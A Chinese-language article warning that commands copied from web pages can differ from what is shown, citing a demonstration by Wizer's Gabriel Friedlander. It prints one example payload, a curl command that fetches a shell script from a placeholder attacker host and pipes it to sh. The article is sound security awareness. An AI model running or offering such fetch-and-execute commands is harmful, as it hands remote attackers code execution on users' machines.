每天,數以百萬計的程序員、管理員和安全研究人員執行簡單的任務,例如將網頁中的命令直接複製和粘貼到他們 PC 上的控制台中。
儘管許多人甚至沒有考慮過,但其後果比您最初想像的要嚴重和危險得多,尤其是在您存儲敏感或有價值的數據時。
一位著名的安全專家花時間分享了從網頁複製 + 粘貼內容時實際發生的情況。
複製 + 粘貼是一種獲得黑客攻擊的簡單方法
Wizer 安全教育平台的創始人加布里埃爾·弗里德蘭德 (Gabriel Friedlander) 揭開了一張圖表的面紗,讓您在從網頁複製和粘貼命令之前三思而後行。
如今,從 Internet 複製和粘貼內容已變得如此普遍,以至於沒有人考慮過它。
然而,弗里德蘭德警告說,有些網頁比乍一看更具欺騙性,你認為你複製的內容與你實際所做的非常不同。
最糟糕的是,如果沒有必要的知識或指導,受害者只有在插入文本後才意識到自己的錯誤,此時可能為時已晚。
這位安全分析師還為他的博客讀者設計了一個小測驗,讓人們真正了解您是多麼不願意向網絡犯罪分子敞開大門。
它提供了一個要復制的命令,但只有當您粘貼文本並查看您實際輸入到設置中的內容時,才會顯示相關的真相。
複製上面屏幕截圖中顯示的命令後,粘貼的結果會讓您震驚,因為它與您認為複制的內容相去甚遠。
curl http://attacker-domain:8000/shell.sh | sh
除了剪貼板中存在的完全不同的命令之外,末尾的換行符(或回車符)意味著上述示例將在直接插入 Linux 終端后立即執行。
因此,您最好了解實際情況並將其視為嚴重的安全威脅。我們並不是說所有網站都隱藏惡意內容,但您應該考慮到這一點。
您是否曾因在終端中插入棘手的命令而遭到黑客攻擊?在下面的評論部分與我們分享您的經驗。
發佈留言